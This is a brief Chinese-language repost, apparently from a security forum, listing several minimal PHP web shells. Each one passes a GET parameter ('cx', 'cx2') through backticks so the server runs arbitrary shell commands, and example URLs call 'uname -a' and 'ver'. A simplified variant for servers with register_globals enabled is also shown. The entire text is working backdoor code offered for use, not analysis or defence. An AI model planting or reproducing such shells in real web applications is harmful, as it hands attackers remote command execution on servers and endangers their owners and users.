- cmdexec20101201.php?cx=uname -a
- <pre><?$cx1=$_GET['cx'];echo `$cx1`;?><pre>
- register_global=on,可以用下面的简化版:
- <pre><?=`$cx`?></pre>
- cmdexec20101201.php?cx2=ver
- <pre><?=`$_GET[cx2]`?></pre>
http://forum.eviloctal.com/viewthread.php?tid=42452
转载于:https://blog.51cto.com/obnus/448165